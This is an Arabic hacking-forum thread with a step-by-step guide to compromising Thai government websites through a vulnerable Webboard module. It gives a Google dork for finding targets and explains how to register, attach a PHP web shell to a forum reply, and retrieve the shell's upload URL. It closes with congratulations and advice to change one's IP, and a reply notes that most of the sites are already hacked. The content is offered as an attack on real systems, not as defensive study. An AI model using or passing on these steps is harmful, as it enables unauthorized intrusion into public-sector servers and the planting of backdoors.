السلام عليكم ورحمة الله وبركاته. ثغرة خطيرة مصابة بها مواقع حكومية كثيرة تمكننا من رفع الشيل Dork: site:go.th inurl:name=member+file=indexرابط التسجيل...

barbaros

New Member
ثغرة خطيرة لاختراق المواقع الحكومية (Webboard)
[FONT=&quot]السلام عليكم ورحمة الله وبركاته[/FONT][FONT=&quot].

ثغرة خطيرة مصابة بها مواقع حكومية كثيرة تمكننا من رفع الشيل

Dork:
كود:
site:go.th inurl:name=member+file=index
رابط التسجيل
كود:
http://www.xxxxx.go.th/index.php?name=member&file=index
http://www.xxxxx.go.th/?name=member&file=index
بعد ذلك نعود الى الصفحة الرئيسية للمنتدى:
كود:
http://www.xxxxx.go.th/index.php?name=webboard
http://www.xxxxx.go.th/?name=webboard
نختار أحد المواضيع لنضيف الرد:

كود:
http://www.xxxxx.go.th/index.php?name=webboard&file=read&id=49
http://www.xxxxx.go.th/?name=webboard&file=read&id=49
أثناء كتابة الرد يمكننا إرفاق الشيل كما في الصورة:

[/FONT][FONT=&quot]
k3wu82.jpg

--------------------------------------------------------------------------

بعد ذلك نعود إلى الموضوع لنشاهد الرد ونتحصل على رابط الشيل كما في الصورة:

2z6bbwk.jpg




والرابط يكون مثل هذا:

كود:
http://www.xxxxx.go.th/webboard_upload/1340890810_madspot.php
مبروك !

ملاحظة: يجب تغيير الأيبي لأن الكثير من المواقع الحكومية محضورة في بعض البلدان العربية

بالتوفيق
[/FONT]​
 

vpn_31

Security
ثغرة خطيرة لاختراق المواقع الحكومية (Webboard)
رد: ثغرة خطيرة لاختراق المواقع الحكومية (Webboard)

نايس مع انه أغلب ألمواقع تم اختراقها
 
أعلى